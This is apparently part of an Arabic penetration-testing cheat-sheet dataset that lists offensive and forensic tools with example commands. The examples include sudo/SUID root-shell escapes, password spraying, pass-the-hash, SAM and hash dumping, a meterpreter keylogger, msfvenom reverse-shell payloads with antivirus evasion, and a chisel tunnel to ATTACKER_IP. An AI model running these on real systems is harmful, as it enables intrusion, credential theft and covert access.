  id: 824, name: 'gtfobins', cat: 'privesc', level: 'intermediate',
  syntax: '# Web: https://gtfobins.github.io',
  short: 'استغلال الأدوات المثبتة لرفع الصلاحيات',
  desc: `GTFOBins قاعدة بيانات تُوثّق كيفية استغلال 200+ Binary عادي لرفع الصلاحيات على Linux. كل Binary له أساليب للـ Shell، File Read، File Write، Reverse Shell عبر: SUID، Sudo، Capabilities.`,
  options: [
    { flag: 'sudo -l', desc: 'أول خطوة: فحص sudo Permissions' },
    { flag: 'find / -perm -u=s', desc: 'البحث عن SUID Binaries' },
    { flag: 'getcap -r / 2>/dev/null', desc: 'فحص Linux Capabilities' },
  ],
  examples: [
    { cmd: 'find / -perm -u=s -type f 2>/dev/null', desc: 'إيجاد SUID Binaries' },
    { cmd: 'sudo find . -exec /bin/bash -p \\;', desc: 'استغلال find مع Sudo' },
    { cmd: 'sudo vim -c ":!bash"', desc: 'استغلال vim مع Sudo' },
    { cmd: 'python3 -c "import os; os.setuid(0); os.system(\'/bin/bash\')"', desc: 'استغلال Python SUID' },
    { cmd: 'sudo awk \'BEGIN {system("/bin/bash")}\'', desc: 'استغلال awk مع Sudo' },
  ],
  tips: '💡 راجع GTFOBins.github.io لكل أداة تجدها بـ SUID أو Sudo.',
  related: ['linpeas', 'sudo', 'lolbas'],
},

// ─── ACTIVE DIRECTORY ────────────────────────────────────────
{
  id: 825, name: 'bloodhound-python', cat: 'exploitation', level: 'advanced',
  syntax: 'bloodhound-python -u USER -p PASS -d DOMAIN -ns DC_IP',
  short: 'جمع بيانات Active Directory لـ BloodHound',
  desc: `BloodHound Python Collector يجمع بيانات Active Directory (Users، Groups، Computers، ACLs، Trusts) وينشئ JSON files لتحليلها في BloodHound.`,
  options: [
    { flag: '-u USER', desc: 'اسم المستخدم' },
    { flag: '-p PASS', desc: 'كلمة المرور' },
    { flag: '-d DOMAIN', desc: 'اسم النطاق' },
    { flag: '-ns DC_IP', desc: 'IP الـ Domain Controller' },
    { flag: '-c All', desc: 'جمع كل البيانات' },
    { flag: '--zip', desc: 'ضغط الناتج' },
  ],
  examples: [
    { cmd: 'bloodhound-python -u user -p pass -d corp.local -ns 192.168.1.10 -c All', desc: 'جمع كل بيانات AD' },
    { cmd: 'bloodhound-python -u user -p pass -d corp.local -ns DC_IP -c All --zip', desc: 'مع ضغط' },
    { cmd: 'neo4j console &\nbloodhound &', desc: 'تشغيل BloodHound' },
  ],
  tips: '💡 ارفع ملفات JSON في BloodHound واستخدم "Find Shortest Paths to Domain Admins".',
  related: ['impacket', 'crackmapexec', 'mimikatz'],
},
{
  id: 826, name: 'kerbrute', cat: 'exploitation', level: 'advanced',
  syntax: 'kerbrute userenum -d DOMAIN --dc DC_IP USERLIST',
  short: 'تعداد مستخدمي AD والـ Password Spraying',
  desc: `Kerbrute أداة Go سريعة لتعداد مستخدمي Active Directory عبر Kerberos وتنفيذ Password Spraying. لا تُسجّل في Logon Events الاعتيادية مما يجعلها أهدأ من SMB.`,
  options: [
    { flag: 'userenum', desc: 'تعداد المستخدمين الموجودين' },
    { flag: 'passwordspray', desc: 'Password Spraying' },
    { flag: 'bruteuser', desc: 'Brute Force مستخدم محدد' },
    { flag: '-d DOMAIN', desc: 'اسم النطاق' },
    { flag: '--dc DC_IP', desc: 'IP الـ Domain Controller' },
  ],
  examples: [
    { cmd: 'kerbrute userenum -d corp.local --dc 192.168.1.10 users.txt', desc: 'تعداد المستخدمين' },
    { cmd: 'kerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt "Password123"', desc: 'Password Spraying' },
    { cmd: 'kerbrute bruteuser -d corp.local --dc 192.168.1.10 -u admin rockyou.txt', desc: 'Brute Force حساب' },
  ],
  tips: '⚠️ Password Spraying قد يُقفل الحسابات. جرّب كلمة مرور واحدة كل 30 دقيقة.',
  related: ['bloodhound-python', 'impacket', 'rubeus'],
},
{
  id: 827, name: 'ldapsearch', cat: 'exploitation', level: 'intermediate',
  syntax: 'ldapsearch -x -H ldap://DC_IP -b "BASE_DN"',
  short: 'استعلام LDAP لاستخراج معلومات AD',
  desc: `ldapsearch أداة لاستعلام خوادم LDAP. تُستخدم لاستخراج معلومات Active Directory: المستخدمون، المجموعات، السياسات. تعمل أحياناً بدون مصادقة (Anonymous LDAP Bind).`,
  options: [
    { flag: '-x', desc: 'استخدام Simple Authentication' },
    { flag: '-H ldap://HOST', desc: 'عنوان الخادم' },
    { flag: '-b "BASE_DN"', desc: 'نقطة البداية في الشجرة' },
    { flag: '-D USER', desc: 'المستخدم للمصادقة' },
    { flag: '-w PASS', desc: 'كلمة المرور' },
    { flag: '-s sub', desc: 'بحث في كل الشجرة' },
  ],
  examples: [
    { cmd: 'ldapsearch -x -H ldap://192.168.1.10 -b "dc=corp,dc=local" "(objectClass=user)"', desc: 'استخراج كل المستخدمين' },
    { cmd: 'ldapsearch -x -H ldap://DC_IP -b "dc=corp,dc=local" -D "user@corp.local" -w pass "(objectClass=*)"', desc: 'مع مصادقة' },
    { cmd: 'ldapsearch -x -H ldap://DC_IP -b "" -s base namingcontexts', desc: 'الحصول على Base DN' },
    { cmd: 'ldapsearch -x -H ldap://DC_IP -b "dc=corp,dc=local" "(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,dc=corp,dc=local))"', desc: 'أعضاء Domain Admins' },
  ],
  tips: '💡 جرّب Anonymous LDAP Bind أولاً (بدون -D -w) قد يعمل على أنظمة قديمة.',
  related: ['bloodhound-python', 'enum4linux', 'crackmapexec'],
},
{
  id: 828, name: 'evil-winrm', cat: 'exploitation', level: 'intermediate',
  syntax: 'evil-winrm -i TARGET -u USER -p PASS',
  short: 'Shell تفاعلي عبر WinRM على Windows',
  desc: `Evil-WinRM أداة Ruby تستخدم بروتوكول WinRM (منفذ 5985/5986) للحصول على Shell تفاعلي على Windows. تدعم Pass-the-Hash، رفع/تنزيل ملفات، تحميل PowerShell Scripts.`,
  options: [
    { flag: '-i HOST', desc: 'IP الهدف' },
    { flag: '-u USER', desc: 'اسم المستخدم' },
    { flag: '-p PASS', desc: 'كلمة المرور' },
    { flag: '-H HASH', desc: 'NTLM Hash لـ Pass-the-Hash' },
    { flag: '-s SCRIPTS_PATH', desc: 'مسار PowerShell Scripts' },
  ],
  examples: [
    { cmd: 'evil-winrm -i 192.168.1.10 -u Administrator -p "Password123"', desc: 'اتصال أساسي' },
    { cmd: 'evil-winrm -i 192.168.1.10 -u admin -H "NTLM_HASH"', desc: 'Pass-the-Hash' },
    { cmd: '# داخل evil-winrm:\nupload /local/file.ps1 C:\\Windows\\Temp\\', desc: 'رفع ملف' },
    { cmd: '# داخل evil-winrm:\ndownload C:\\Windows\\System32\\config\\SAM', desc: 'تنزيل ملف' },
  ],
  tips: '💡 WinRM مفتوح افتراضياً على Windows Server 2012+.',
  related: ['crackmapexec', 'impacket', 'msfconsole'],
},

// ─── FORENSICS & INCIDENT RESPONSE ───────────────────────────
{
  id: 829, name: 'dd', cat: 'forensics', level: 'intermediate',
  syntax: 'dd if=SOURCE of=DEST [OPTIONS]',
  short: 'نسخ وإنشاء صور الأقراص',
  desc: `dd أداة Unix الأساسية لنسخ البيانات بيت بيت. تُستخدم في التحليل الجنائي لإنشاء صور كاملة للأقراص أو الأقسام. تحفظ كل شيء بما فيه الفراغات والبيانات المحذوفة.`,
  options: [
    { flag: 'if=SOURCE', desc: 'مصدر البيانات' },
    { flag: 'of=DEST', desc: 'الوجهة' },
    { flag: 'bs=4M', desc: 'حجم الكتلة (أسرع)' },
    { flag: 'status=progress', desc: 'عرض التقدم' },
    { flag: 'conv=sync,noerror', desc: 'تجاوز الأخطاء' },
  ],
  examples: [
    { cmd: 'dd if=/dev/sda of=/evidence/disk.img bs=4M status=progress', desc: 'نسخ قرص كامل' },
    { cmd: 'dd if=/dev/sda1 of=partition.img bs=4M status=progress', desc: 'نسخ قسم محدد' },
    { cmd: 'md5sum /evidence/disk.img > disk.md5', desc: 'التحقق من سلامة الصورة' },
    { cmd: 'dd if=disk.img | strings | grep -i "password"', desc: 'استخراج سلاسل نصية' },
  ],
  tips: '💡 احسب MD5 دائماً قبل وبعد النسخ للتحقق من النزاهة.',
  related: ['dcfldd', 'autopsy', 'volatility'],
},
{
  id: 830, name: 'foremost', cat: 'forensics', level: 'intermediate',
  syntax: 'foremost [OPTIONS] -i IMAGE',
  short: 'استعادة الملفات المحذوفة',
  desc: `Foremost يستعيد الملفات المحذوفة من صور الأقراص بالبحث عن File Signatures (Magic Bytes). يدعم JPEG, PNG, PDF, Office, ZIP, EXE وغيرها.`,
  options: [
    { flag: '-i IMAGE', desc: 'ملف الصورة أو الجهاز' },
    { flag: '-o OUTPUT', desc: 'مجلد الناتج' },
    { flag: '-t TYPE', desc: 'أنواع الملفات للاسترداد' },
    { flag: '-v', desc: 'وضع المخرجات التفصيلية' },
  ],
  examples: [
    { cmd: 'foremost -i disk.img -o /output/recovered/', desc: 'استعادة كل الملفات' },
    { cmd: 'foremost -t jpg,png,pdf -i disk.img -o /output/', desc: 'استعادة أنواع محددة' },
    { cmd: 'foremost -v -i /dev/sdb -o /output/', desc: 'من قرص مباشرة' },
  ],
  tips: '💡 Photorec بديل أقوى يدعم 500+ صيغة ملف.',
  related: ['photorec', 'testdisk', 'scalpel'],
},
{
  id: 831, name: 'autopsy', cat: 'forensics', level: 'intermediate',
  syntax: 'autopsy',
  short: 'منصة التحليل الجنائي الرقمي الشاملة',
  desc: `Autopsy منصة تحليل جنائي رقمي مفتوحة المصدر مبنية على The Sleuth Kit. توفر واجهة ويب لتحليل الأقراص: استعادة الملفات، تحليل الـ Timeline، استخراج البيانات من Browsers والبريد.`,
  options: [
    { flag: '# Web Interface:', desc: 'http://localhost:9999/autopsy' },
    { flag: 'mmls disk.img', desc: 'عرض جدول الأقسام' },
    { flag: 'fls -r disk.img', desc: 'قائمة الملفات' },
    { flag: 'icat disk.img INODE', desc: 'استخراج ملف محدد' },
  ],
  examples: [
    { cmd: 'autopsy', desc: 'تشغيل Autopsy (يفتح متصفح)' },
    { cmd: 'mmls disk.img', desc: 'عرض الأقسام في صورة القرص' },
    { cmd: 'fls -r -l disk.img | grep -i ".doc\\|.pdf\\|.jpg"', desc: 'البحث عن ملفات محددة' },
    { cmd: 'icat disk.img 12345 > recovered.pdf', desc: 'استخراج ملف برقم inode' },
  ],
  tips: '💡 استخدم New Case في Autopsy لكل تحقيق جديد للحفاظ على منهجية العمل.',
  related: ['volatility', 'dd', 'foremost'],
},

// ─── CTF & CRYPTOGRAPHY ───────────────────────────────────────
{
  id: 832, name: 'cyberchef', cat: 'ctf', level: 'beginner',
  syntax: '# Web: https://gchq.github.io/CyberChef/',
  short: 'تحليل وتحويل البيانات - السكين السويسري',
  desc: `CyberChef "The Cyber Swiss Army Knife" من GCHQ. يحلل ويحول البيانات: Base64، Hex، ROT13، XOR، AES، RSA، Regex. يعمل في المتصفح بالكامل. أساسي في CTF.`,
  options: [
    { flag: 'From Base64', desc: 'فك ترميز Base64' },
    { flag: 'From Hex', desc: 'تحويل Hex لنص' },
    { flag: 'ROT13', desc: 'تحويل ROT13' },
    { flag: 'XOR {key}', desc: 'فك XOR بمفتاح' },
    { flag: 'Magic', desc: 'تحديد التشفير تلقائياً' },
  ],
  examples: [
    { cmd: '# في المتصفح:\n# Input: SGVsbG8gV29ybGQ=\n# Recipe: From Base64\n# Output: Hello World', desc: 'فك Base64' },
    { cmd: '# Recipe: Magic\n# يحدد التشفير تلقائياً', desc: 'اكتشاف تلقائي' },
    { cmd: 'echo "SGVsbG8=" | base64 -d', desc: 'Base64 من سطر الأوامر' },
    { cmd: 'echo "Hello" | xxd', desc: 'تحويل لـ Hex' },
  ],
  tips: '💡 "Magic" Recipe يجرب كل أنواع التشفير تلقائياً - ابدأ به دائماً.',
  related: ['openssl', 'gpg', 'steghide'],
},
{
  id: 833, name: 'binwalk', cat: 'forensics', level: 'intermediate',
  syntax: 'binwalk [OPTIONS] FILE',
  short: 'تحليل واستخراج البيانات المخفية في الملفات الثنائية',
  desc: `Binwalk يحلل الملفات الثنائية للبحث عن ملفات مضمّنة وكود مخفي. يُستخدم كثيراً في CTF لتحليل ملفات Firmware وصور مضمّنة. يستطيع استخراج ما يجد تلقائياً.`,
  options: [
    { flag: '-e', desc: 'استخراج تلقائي' },
    { flag: '-E', desc: 'تحليل الـ Entropy' },
    { flag: '-M', desc: 'فحص متكرر للملفات المستخرجة' },
    { flag: '-D "type:ext"', desc: 'استخراج نوع محدد' },
  ],
  examples: [
    { cmd: 'binwalk firmware.bin', desc: 'تحليل الملف' },
    { cmd: 'binwalk -e firmware.bin', desc: 'استخراج تلقائي' },
    { cmd: 'binwalk -E file.jpg', desc: 'تحليل الـ Entropy (كشف تشفير)' },
    { cmd: 'binwalk -Me firmware.bin', desc: 'استخراج متكرر' },
  ],
  tips: '💡 binwalk -E يُظهر مناطق عالية الـ Entropy = مشفرة أو مضغوطة.',
  related: ['foremost', 'file', 'strings'],
},
{
  id: 834, name: 'steghide', cat: 'ctf', level: 'intermediate',
  syntax: 'steghide embed/extract -sf FILE',
  short: 'إخفاء واستخراج البيانات في الصور والصوت',
  desc: `Steghide أداة Steganography لإخفاء واستخراج البيانات في ملفات JPEG وBMP وWAV وAU. يدعم التشفير بكلمة مرور. شائع جداً في CTF Forensics.`,
  options: [
    { flag: 'embed -cf COVER -sf SECRET', desc: 'إخفاء ملف في صورة' },
    { flag: 'extract -sf FILE', desc: 'استخراج البيانات المخفية' },
    { flag: '-p PASSWORD', desc: 'تحديد كلمة المرور' },
    { flag: 'info FILE', desc: 'معلومات الإخفاء في الملف' },
  ],
  examples: [
    { cmd: 'steghide extract -sf image.jpg', desc: 'استخراج بدون كلمة مرور' },
    { cmd: 'steghide extract -sf image.jpg -p "password123"', desc: 'استخراج بكلمة مرور' },
    { cmd: 'steghide info image.jpg', desc: 'فحص وجود بيانات مخفية' },
    { cmd: 'stegseek image.jpg rockyou.txt', desc: 'كسر كلمة مرور steghide' },
  ],
  tips: '💡 stegseek أسرع بكثير لكسر كلمات مرور steghide.',
  related: ['binwalk', 'exiftool', 'zsteg'],
},

// ─── RECON & OSINT ────────────────────────────────────────────
{
  id: 835, name: 'recon-ng', cat: 'recon', level: 'intermediate',
  syntax: 'recon-ng',
  short: 'إطار OSINT متكامل بشكل مشابه لـ Metasploit',
  desc: `Recon-ng إطار استطلاع مفتوح المصدر بواجهة مشابهة لـ Metasploit. يحتوي على عشرات الـ Modules لجمع معلومات من: Shodan، LinkedIn، GitHub، DNS، Whois وغيرها.`,
  options: [
    { flag: 'marketplace search', desc: 'البحث عن Modules' },
    { flag: 'marketplace install MODULE', desc: 'تثبيت Module' },
    { flag: 'modules load MODULE', desc: 'تحميل Module' },
    { flag: 'options set SOURCE', desc: 'تحديد الهدف' },
    { flag: 'run', desc: 'تشغيل الـ Module' },
  ],
  examples: [
    { cmd: 'recon-ng', desc: 'تشغيل Recon-ng' },
    { cmd: 'workspaces create target_company', desc: 'إنشاء مساحة عمل' },
    { cmd: 'marketplace install recon/domains-hosts/hackertarget', desc: 'تثبيت Module' },
    { cmd: 'modules load recon/domains-hosts/hackertarget\noptions set SOURCE target.com\nrun', desc: 'جمع Subdomains' },
  ],
  tips: '💡 keys add shodan_api KEY لاستخدام Shodan API في Recon-ng.',
  related: ['theHarvester', 'maltego', 'amass'],
},
{
  id: 836, name: 'dnsx', cat: 'recon', level: 'intermediate',
  syntax: 'dnsx -d DOMAIN [OPTIONS]',
  short: 'فحص DNS سريع وشامل',
  desc: `DNSx أداة Go سريعة جداً لفحص DNS. تفحص A، AAAA، CNAME، MX، TXT، NS، PTR Records لقوائم ضخمة من الـ Domains. مفيدة في Recon وVerification.`,
  options: [
    { flag: '-d DOMAIN', desc: 'نطاق محدد' },
    { flag: '-l FILE', desc: 'قائمة نطاقات' },
    { flag: '-a', desc: 'A Records' },
    { flag: '-cname', desc: 'CNAME Records' },
    { flag: '-mx', desc: 'MX Records' },
    { flag: '-txt', desc: 'TXT Records' },
    { flag: '-zt', desc: 'محاولة Zone Transfer' },
  ],
  examples: [
    { cmd: 'dnsx -d target.com -a -cname -mx -txt', desc: 'فحص Records متعددة' },
    { cmd: 'cat subdomains.txt | dnsx -a -silent', desc: 'فحص قائمة Subdomains' },
    { cmd: 'dnsx -d target.com -zt', desc: 'محاولة Zone Transfer' },
    { cmd: 'subfinder -d target.com | dnsx -a -o ips.txt', desc: 'Pipeline مع Subfinder' },
  ],
  tips: '💡 Zone Transfer يكشف كل Subdomains إذا نجح.',
  related: ['subfinder', 'amass', 'dig'],
},
{
  id: 837, name: 'shodan-cli', cat: 'recon', level: 'intermediate',
  syntax: 'shodan [COMMAND]',
  short: 'واجهة سطر أوامر لـ Shodan',
  desc: `Shodan CLI يتيح استخدام Shodan من سطر الأوامر. ابحث عن أجهزة IoT وخوادم مكشوفة وثغرات بـ CVE من Terminal مباشرة. يحتاج API Key.`,
  options: [
    { flag: 'search QUERY', desc: 'بحث في Shodan' },
    { flag: 'host IP', desc: 'معلومات عن IP محدد' },
    { flag: 'count QUERY', desc: 'عدد النتائج' },
    { flag: 'download FILE QUERY', desc: 'تنزيل النتائج' },
  ],
  examples: [
    { cmd: 'shodan init YOUR_API_KEY', desc: 'إعداد API Key' },
    { cmd: 'shodan search "apache" country:SA', desc: 'بحث عن Apache في السعودية' },
    { cmd: 'shodan host 8.8.8.8', desc: 'معلومات IP' },
    { cmd: 'shodan search "ssl.cert.subject.CN:*.target.com" --fields ip_str,port', desc: 'شهادات الهدف' },
    { cmd: 'shodan search "org:TargetCorp" country:AE', desc: 'أجهزة الشركة' },
  ],
  tips: '💡 shodan.io/developer للحصول على API Key مجاني.',
  related: ['shodan', 'censys', 'theHarvester'],
},
{
  id: 838, name: 'fierce', cat: 'recon', level: 'intermediate',
  syntax: 'fierce --domain DOMAIN',
  short: 'تعداد DNS الشامل',
  desc: `Fierce أداة Python لاكتشاف النطاقات الفرعية عبر تقنيات متعددة: Zone Transfer، محاولة Brute Force للـ Subdomains، البحث عن Wild-cards.`,
  options: [
    { flag: '--domain DOMAIN', desc: 'النطاق الهدف' },
    { flag: '--subdomains FILE', desc: 'قائمة Subdomains للاختبار' },
    { flag: '--dns-servers IP', desc: 'خادم DNS مخصص' },
    { flag: '--timeout 5', desc: 'مهلة الاستجابة' },
  ],
  examples: [
    { cmd: 'fierce --domain target.com', desc: 'استطلاع DNS شامل' },
    { cmd: 'fierce --domain target.com --subdomains /usr/share/seclists/Discovery/DNS/subdomains-top1million.txt', desc: 'مع قائمة مخصصة' },
    { cmd: 'fierce --domain target.com --dns-servers 8.8.8.8', desc: 'مع DNS مخصص' },
  ],
  tips: '💡 ابدأ دائماً بمحاولة Zone Transfer قبل Brute Force.',
  related: ['dnsx', 'subfinder', 'amass'],
},

// ─── WIRELESS SECURITY ────────────────────────────────────────
{
  id: 839, name: 'wifite', cat: 'wireless', level: 'intermediate',
  syntax: 'wifite [OPTIONS]',
  short: 'هجمات WiFi تلقائية شاملة',
  desc: `Wifite أداة Python تُشغّل هجمات WiFi تلقائياً: WEP، WPA/WPA2، PMKID، WPS. تكتشف الشبكات وتختار أفضل هجوم لكل شبكة. تحتاج Aircrack-ng و Hashcat.`,
  options: [
    { flag: '--kill', desc: 'إيقاف العمليات المتعارضة' },
    { flag: '-i INTERFACE', desc: 'الواجهة الشبكية' },
    { flag: '--wpa', desc: 'الهجوم على WPA فقط' },
    { flag: '--pmkid', desc: 'هجوم PMKID فقط' },
    { flag: '--dict FILE', desc: 'قاموس كلمات المرور' },
  ],
  examples: [
    { cmd: 'sudo wifite', desc: 'تشغيل تلقائي' },
    { cmd: 'sudo wifite --kill --wpa --pmkid', desc: 'WPA + PMKID فقط' },
    { cmd: 'sudo wifite -i wlan0 --dict rockyou.txt', desc: 'مع قاموس مخصص' },
  ],
  tips: '⚠️ استخدم فقط على شبكاتك الخاصة أو بإذن صريح.',
  related: ['aircrack-ng', 'hashcat', 'hcxdumptool'],
},
{
  id: 840, name: 'hcxdumptool', cat: 'wireless', level: 'advanced',
  syntax: 'hcxdumptool -i INTERFACE -o OUTPUT',
  short: 'التقاط WPA Handshakes وPMKID',
  desc: `hcxdumptool أداة متقدمة لالتقاط حزم WiFi وHandshakes وPMKID. تدعم WPA/WPA2/WPA3. الناتج يُستخدم مع hcxpcapngtool وhashcat للكسر.`,
  options: [
    { flag: '-i INTERFACE', desc: 'الواجهة في Monitor Mode' },
    { flag: '-o OUTPUT.pcapng', desc: 'ملف الالتقاط' },
    { flag: '--enable_status=1', desc: 'عرض الحالة' },
    { flag: '--filterlist_ap=FILE', desc: 'استهداف MAC محدد' },
  ],
  examples: [
    { cmd: 'sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1', desc: 'التقاط PMKID/Handshake' },
    { cmd: 'hcxpcapngtool capture.pcapng -o hash.hc22000', desc: 'تحويل للـ hashcat' },
    { cmd: 'hashcat -m 22000 hash.hc22000 rockyou.txt', desc: 'كسر WPA2' },
  ],
  tips: '💡 PMKID لا يحتاج انتظار Client. أسرع من الـ 4-Way Handshake.',
  related: ['aircrack-ng', 'hashcat', 'wifite'],
},

// ─── POST EXPLOITATION ────────────────────────────────────────
{
  id: 841, name: 'meterpreter', cat: 'exploitation', level: 'intermediate',
  syntax: 'msfconsole > sessions -i ID',
  short: 'Shell متقدم لما بعد الاختراق',
  desc: `Meterpreter Shell متقدم في Metasploit يعمل في الذاكرة بالكامل. يوفر: رفع/تنزيل ملفات، Keylogger، Screenshot، Webcam، Migrate، Persistence، وأكثر.`,
  options: [
    { flag: 'sysinfo', desc: 'معلومات النظام' },
    { flag: 'getuid', desc: 'المستخدم الحالي' },
    { flag: 'getsystem', desc: 'محاولة رفع لـ SYSTEM' },
    { flag: 'hashdump', desc: 'استخراج هاشات كلمات المرور' },
    { flag: 'shell', desc: 'الانتقال لـ CMD Shell' },
    { flag: 'migrate PID', desc: 'الانتقال لعملية أخرى' },
  ],
  examples: [
    { cmd: 'sysinfo && getuid && getpid', desc: 'معلومات أساسية' },
    { cmd: 'getsystem', desc: 'رفع الصلاحيات لـ SYSTEM' },
    { cmd: 'run post/windows/gather/credentials/credential_collector', desc: 'جمع بيانات الاعتماد' },
    { cmd: 'download C:\\Users\\admin\\Desktop\\passwords.txt /tmp/', desc: 'تنزيل ملف' },
    { cmd: 'run post/multi/recon/local_exploit_suggester', desc: 'اقتراح Exploits لرفع الصلاحيات' },
    { cmd: 'keyscan_start && sleep 60 && keyscan_dump', desc: 'Keylogger' },
  ],
  tips: '💡 migrate إلى عملية مستقرة (explorer.exe) لتجنب انهيار الجلسة.',
  related: ['msfconsole', 'msfvenom', 'empire'],
},
{
  id: 842, name: 'msfvenom', cat: 'exploitation', level: 'intermediate',
  syntax: 'msfvenom -p PAYLOAD LHOST=IP LPORT=PORT -f FORMAT -o FILE',
  short: 'إنشاء Payloads للـ Reverse Shell',
  desc: `Msfvenom ينشئ Payloads بأشكال مختلفة للاختراق: EXE لـ Windows، ELF لـ Linux، APK لـ Android، PHP، Python، PowerShell. يدعم الترميز لتجاوز الـ Antivirus.`,
  options: [
    { flag: '-p PAYLOAD', desc: 'نوع الـ Payload' },
    { flag: 'LHOST=IP', desc: 'IP المهاجم' },
    { flag: 'LPORT=PORT', desc: 'منفذ الاستماع' },
    { flag: '-f FORMAT', desc: 'صيغة الناتج (exe, elf, php...)' },
    { flag: '-e ENCODER', desc: 'الترميز لتجاوز AV' },
    { flag: '-x TEMPLATE', desc: 'حقن في برنامج شرعي' },
  ],
  examples: [
    { cmd: 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o payload.exe', desc: 'Windows Payload' },
    { cmd: 'msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf -o payload', desc: 'Linux Payload' },
    { cmd: 'msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php', desc: 'PHP Web Shell' },
    { cmd: 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe', desc: 'مع Encoding' },
  ],
  tips: '💡 استخدم -x template.exe لحقن Payload في برنامج شرعي.',
  related: ['msfconsole', 'meterpreter', 'unicorn'],
},
{
  id: 843, name: 'proxychains', cat: 'network', level: 'intermediate',
  syntax: 'proxychains COMMAND [ARGS]',
  short: 'توجيه الأدوات عبر Proxy وشبكات مخفية',
  desc: `Proxychains يوجّه أي أداة عبر SOCKS4/5 أو HTTP Proxy. يُستخدم مع SSH Dynamic Tunneling أو Chisel أو Tor للوصول لشبكات داخلية أو إخفاء الهوية.`,
  options: [
    { flag: 'strict_chain', desc: 'تتبع الـ Chain بالترتيب' },
    { flag: 'dynamic_chain', desc: 'تخطي Proxies المعطلة' },
    { flag: 'random_chain', desc: 'ترتيب عشوائي' },
    { flag: 'socks5 127.0.0.1 1080', desc: 'SOCKS5 Proxy' },
  ],
  examples: [
    { cmd: 'echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf', desc: 'إضافة Proxy' },
    { cmd: 'proxychains nmap -sT -Pn INTERNAL_IP', desc: 'Nmap عبر Proxy' },
    { cmd: 'proxychains curl http://INTERNAL_SERVER', desc: 'HTTP عبر Proxy' },
    { cmd: 'proxychains msfconsole', desc: 'Metasploit عبر Proxy' },
    { cmd: 'ssh -D 9050 user@PIVOT_HOST && proxychains firefox', desc: 'تصفح عبر SSH Proxy' },
  ],
  tips: '💡 -q لإخفاء رسائل proxychains. استخدمها مع Chisel أو SSH -D.',
  related: ['chisel', 'ligolo-ng', 'ssh-tunnel'],
},
{
  id: 844, name: 'chisel', cat: 'network', level: 'advanced',
  syntax: '# Server: ./chisel server -p PORT --reverse\n# Client: ./chisel client SERVER_IP:PORT R:1080:socks',
  short: 'HTTP Tunneling سريع للـ Pivoting',
  desc: `Chisel أداة Go لإنشاء TCP Tunnels عبر HTTP/HTTPS. تعمل حتى مع الـ Firewalls التي تسمح فقط بحركة الويب. مثالية للـ Pivoting في الشبكات الداخلية.`,
  options: [
    { flag: 'server -p PORT', desc: 'تشغيل Server' },
    { flag: '--reverse', desc: 'السماح بالـ Reverse Tunnels' },
    { flag: 'client SERVER:PORT', desc: 'الاتصال بالـ Server' },
    { flag: 'R:PORT:socks', desc: 'SOCKS Proxy عكسي' },
    { flag: 'R:PORT:DEST:DPORT', desc: 'Port Forward عكسي' },
  ],
  examples: [
    { cmd: '# Server (المهاجم):\n./chisel server -p 8080 --reverse', desc: 'تشغيل Server' },
    { cmd: '# Client (الضحية):\n./chisel client ATTACKER_IP:8080 R:1080:socks', desc: 'SOCKS Proxy عكسي' },
    { cmd: '# Port Forward:\n./chisel client ATTACKER_IP:8080 R:8888:INTERNAL:80', desc: 'تحويل منفذ' },
    { cmd: 'proxychains curl http://INTERNAL_IP', desc: 'استخدام النفق' },
  ],
  tips: '💡 اربطه مع Proxychains للوصول الكامل للشبكة الداخلية.',
  related: ['proxychains', 'ligolo-ng', 'socat'],
},

// ─── CLOUD SECURITY ───────────────────────────────────────────
{
  id: 845, name: 'awscli', cat: 'exploitation', level: 'intermediate',
  syntax: 'aws [SERVICE] [COMMAND] [OPTIONS]',
  short: 'واجهة أوامر AWS للاستطلاع والاستغلال',
  desc: `AWS CLI أداة رسمية للتفاعل مع خدمات Amazon Web Services. في اختبار الاختراق: تستخدمها لاستطلاع S3 Buckets وIAM Permissions والـ Instances وخدمات Lambda.`,
  options: [
    { flag: 's3 ls s3://BUCKET', desc: 'عرض محتوى Bucket' },
    { flag: 'iam get-user', desc: 'معلومات المستخدم الحالي' },
    { flag: 'iam list-attached-user-policies', desc: 'صلاحيات المستخدم' },
    { flag: 'ec2 describe-instances', desc: 'عرض الـ Instances' },
    { flag: '--no-sign-request', desc: 'بدون مصادقة (Buckets العامة)' },
  ],
  examples: [
    { cmd: 'aws s3 ls s3://target-bucket --no-sign-request', desc: 'Bucket عام بدون مصادقة' },
    { cmd: 'aws s3 cp s3://target-bucket/config.json . --no-sign-request', desc: 'تنزيل ملف حساس' },
    { cmd: 'aws iam get-user', desc: 'هوية المستخدم الحالي' },
    { cmd: 'aws sts get-caller-identity', desc: 'معلومات الهوية الكاملة' },
    { cmd: 'aws ec2 describe-instances --output table', desc: 'قائمة الـ Instances' },
  ],
  tips: '💡 ~/.aws/credentials لحفظ API Keys. aws configure لإعدادها.',
  related: ['pacu', 'scoutsuite', 'cloudsploit'],
},
{
  id: 846, name: 'pacu', cat: 'exploitation', level: 'advanced',
  syntax: 'pacu',
  short: 'إطار استغلال AWS مثل Metasploit',
  desc: `Pacu إطار استغلال AWS مفتوح المصدر مثل Metasploit. يحتوي على Modules لـ: تعداد IAM، رفع الصلاحيات، استخراج Credentials، Persistence في AWS.`,
  options: [
    { flag: 'run iam__privesc_scan', desc: 'فحص مسارات رفع صلاحيات IAM' },
    { flag: 'run s3__bucket_finder', desc: 'اكتشاف S3 Buckets' },
    { flag: 'run ec2__enum', desc: 'تعداد EC2 Instances' },
    { flag: 'run iam__enum_permissions', desc: 'تعداد الصلاحيات' },
  ],
  examples: [
    { cmd: 'pacu', desc: 'تشغيل Pacu' },
    { cmd: 'import_keys profile_name', desc: 'استيراد AWS Credentials (داخل pacu)' },
    { cmd: 'run iam__privesc_scan', desc: 'فحص مسارات رفع الصلاحيات' },
    { cmd: 'run s3__bucket_finder --word-list buckets.txt', desc: 'اكتشاف Buckets' },
  ],
  tips: '💡 ابدأ بـ iam__enum_permissions لمعرفة ما يمكنك فعله.',
  related: ['awscli', 'scoutsuite', 'cloudsploit'],
},

